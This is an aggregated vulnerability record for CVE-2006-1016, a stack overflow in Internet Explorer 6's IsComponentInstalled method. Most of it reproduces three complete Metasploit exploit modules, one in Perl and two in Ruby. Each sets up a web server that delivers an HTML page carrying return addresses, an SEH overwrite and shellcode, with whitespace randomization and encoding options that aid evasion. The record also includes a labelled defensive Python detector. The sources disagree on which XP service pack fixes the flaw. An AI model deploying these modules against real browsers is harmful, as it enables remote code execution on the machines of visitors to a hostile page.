CVE-2006-1016
CVSS 7.5
Published: 2006-03-06 19:02:00
Revised: 2008-09-05 17:00:48

[Original] Buffer overflow in the IsComponentInstalled method in Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument.


[CNNVD] Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability (CNNVD-200603-078)

A buffer overflow in the IsComponentInstalled method of Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1016
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1016
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-078
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/24923
(UNKNOWN)  XF  ie-iscomponentinstalled-bo(24923)
http://www.metasploit.com/projects/Framework/modules/exploits/ie_iscomponentinstalled.pm
(UNKNOWN)  MISC  http://www.metasploit.com/projects/Framework/modules/exploits/ie_iscomponentinstalled.pm
http://metasploit.com/projects/Framework/exploits.html#ie_iscomponentinstalled
(UNKNOWN)  MISC  http://metasploit.com/projects/Framework/exploits.html#ie_iscomponentinstalled
http://www.securityfocus.com/bid/16870
(UNKNOWN)  BID  16870

- Vulnerability information

Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
High risk  Buffer overflow
2006-03-06 00:00:00 2006-03-08 00:00:00
Remote
A buffer overflow in the IsComponentInstalled method of Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument.

- Advisories and patches

The vendor has not yet provided a patch or upgrade for this vulnerability; users of this software are advised to watch the vendor's home page for the latest version.

- Vulnerability information (1536)

MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit (EDBID:1536)
windows remote
2006-02-28 Verified
0 H D Moore
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_iscomponentinstalled;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };
  
my $info =
  {
	'Name'           => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow',
	'Version'        => '$Revision: 1.2 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a stack overflow in Internet Explorer. This bug was
		patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32' ],
	'Priv'           => 0,

	'AutoOpts'       => { 'EXITFUNC' => 'thread' },
	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Prepend'    => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",	  
		'Space'      => 512,
		'BadChars'   => "\x00\x5c\x0a\x0d\x22",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ]
	  ],
	
	'Keys'           => [ 'ie' ],

	'DisclosureDate' => 'Feb 24 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
		Pex::Utils::SourceIP('1.2.3.4') :
		$self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}
	
	$self->PrintLine("[*] Client connected from $rhost:$rport ($agent)");

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

	$fd->Close();
}

sub GenerateHTML {
	my $self        = shift;
	my $target      = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $pattern     = Pex::Text::AlphaNumText(8192);
	
	substr($pattern, 755, 4, pack('V',  $target->[1] ));
	substr($pattern, 755 + 2888, length($shellcode), $shellcode);

	my $data        = qq|
<html>
<head>
	<title>One second please...</title>
	<script>
		function window.onload() {
			oClientCaps.style.behavior = "url(#default#clientCaps)";
			oClientCaps.isComponentInstalled("$pattern", "componentid");
		}
	</script>
</head>
<body id="oClientCaps">
One second please...
</body>
</html>
|;
	return $data;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}
1;


# milw0rm.com [2006-02-28]
		

- Vulnerability information (16549)

Internet Explorer isComponentInstalled Overflow (EDBID:16549)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: ie_iscomponentinstalled.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Internet Explorer. This bug was
				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
				],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-1016' ],
					[ 'OSVDB', '31647' ],
					[ 'BID', '16870' ],
				],
			'Payload'        =>
				{
					'Space'          => 512,
					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Create the overflow string
		pattern = rand_text_alpha(8192)

		# Smash the return address with a bogus pointer
		pattern[744, 4] = [0xffffffff].pack('V')

		# Handle the exception :-)
		seh = generate_seh_payload(target.ret)
		pattern[6439, seh.length] = seh


		# Build out the HTML response page
		var_client = rand_text_alpha(rand(30)+2)
		var_html   = rand_text_alpha(rand(30)+2)

		content = %Q|
<html>
<head>
	<script>
		function window.onload() {
			#{var_client}.style.behavior = "url(#default#clientCaps)";
			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" );
		}
	</script>
</head>
<body id="#{var_client}">
#{var_html}
</body>
</html>
		|

		content = Rex::Text.randomize_space(content)

		# Insert the shellcode
		content.gsub!('__pattern__', pattern)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability information (F83130)

Internet Explorer isComponentInstalled Overflow (PacketStormID:F83130)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k,xp
CVE-2006-1016

This Metasploit module exploits a stack overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Internet Explorer. This bug was
				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2006-1016' ],
					[ 'OSVDB', '31647' ],
					[ 'BID', '16870' ],
				],
			'Payload'        =>
				{
					'Space'          => 512,
					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Create the overflow string	
		pattern = rand_text_alpha(8192)

		# Smash the return address with a bogus pointer
		pattern[744, 4] = [0xffffffff].pack('V')
		
		# Handle the exception :-)
		seh = generate_seh_payload(target.ret)
		pattern[6439, seh.length] = seh
		

		# Build out the HTML response page
		var_client = rand_text_alpha(rand(30)+2)
		var_html   = rand_text_alpha(rand(30)+2)
		
		content = %Q|
<html >
<head >
	<script >
		function window.onload() {
			#{var_client}.style.behavior = "url(#default#clientCaps)" ;
			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" ) ;
		}
	</script >
</head >
<body id = "#{var_client}" > #{var_html}
</body >
</html >
		|

		content = Rex::Text.randomize_space(content)

		# Insert the shellcode		
		content.gsub!('__pattern__', pattern)
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability information (OSVDB 31647)

Microsoft IE Javascript IsComponentInstalled Overflow
Location: Local / Remote
Attack type: Context Dependent, Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Public, Commercial
Disclosure: Uncoordinated Disclosure

- Vulnerability description

A buffer overflow exists in Internet Explorer. The IsComponentInstalled component fails to validate the first parameter resulting in a stack overflow. With a specially crafted website, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-02-24 Unknown
2006-03-16 Unknown

- Solution

Upgrade to Windows 2000 SP4 or Windows XP SP1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information (Bugtraq ID 16870)

Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
Class: Boundary Condition Error
Remote: Yes  Local: No
Published: 2006-02-28 12:00:00  Updated: 2007-11-15 12:39:00
Reported by H D Moore <hdm@metasploit.com>.

- Affected program versions

Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional

- Vulnerability discussion

Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser.

This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.
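As an added defender-side example (not part of this record and not code from the Metasploit modules reproduced above), the following Python scans an HTML document for clientCaps `isComponentInstalled` calls whose first argument is far longer than any legitimate component ID, tolerating the randomized whitespace and element names the module generates. The length threshold, the placeholder component ID and both sample documents are constructed assumptions.

```python
import re

# Assumed threshold: the modules on this page place the overwrite roughly
# 744-755 bytes into the first argument, so anything over a few hundred
# characters is far beyond a legitimate component ID string.
MAX_ARG_LEN = 256

# A clientCaps call looks like:  X.isComponentInstalled( "..." , "componentid" )
# The module randomizes whitespace and the element name, so the pattern allows
# arbitrary whitespace; the method name is matched case-insensitively because
# the record spells it both IsComponentInstalled and isComponentInstalled.
# The generated first argument is alphabetic filler plus a payload whose
# bad-character list excludes 0x22 (") and 0x5c (\), so it contains no quote
# or backslash and stopping at the next matching quote is sound for it.
CALL_RE = re.compile(
    r'''\.\s*isComponentInstalled\s*\(\s*(["'])(.*?)\1''',
    re.IGNORECASE | re.DOTALL,
)
CLIENTCAPS_RE = re.compile(r'#default#clientCaps', re.IGNORECASE)


def scan_html(html, max_len=MAX_ARG_LEN):
    """Return one finding per isComponentInstalled call whose first argument
    is longer than max_len characters (empty list when nothing is flagged)."""
    uses_clientcaps = bool(CLIENTCAPS_RE.search(html))
    findings = []
    for m in CALL_RE.finditer(html):
        arg_len = len(m.group(2))
        if arg_len > max_len:
            findings.append({
                "offset": m.start(),                   # where the call begins
                "arg_length": arg_len,                 # length of first argument
                "clientcaps_behavior": uses_clientcaps,  # behavior attached?
            })
    return findings


# Constructed sample documents (not captured traffic); the component ID in
# the benign page is a placeholder, not a real component GUID.
BENIGN_HTML = (
    '<html><body id="caps"><script>'
    'caps.style.behavior = "url(#default#clientCaps)";'
    'caps.isComponentInstalled("{placeholder-component-id}", "componentid");'
    '</script></body></html>'
)
SUSPICIOUS_HTML = (
    '<html ><body id = "qz" ><script >'
    'qz.style.behavior = "url(#default#clientCaps)" ;'
    'qz.isComponentInstalled( "' + 'A' * 8192 + '" ,  "componentid" ) ;'
    '</script ></body ></html >'
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        print(name, scan_html(doc))
```

The same check can be run over proxy-captured or sandboxed page bodies; a hit with `clientcaps_behavior` set is the shape both modules on this page produce.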

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit is available for the Metasploit framework:

- Solution

This issue was reportedly fixed in Service Pack 4 for Windows 2000 and Service Pack 2 for Windows XP, but this has not been confirmed. Please contact the vendor for details.
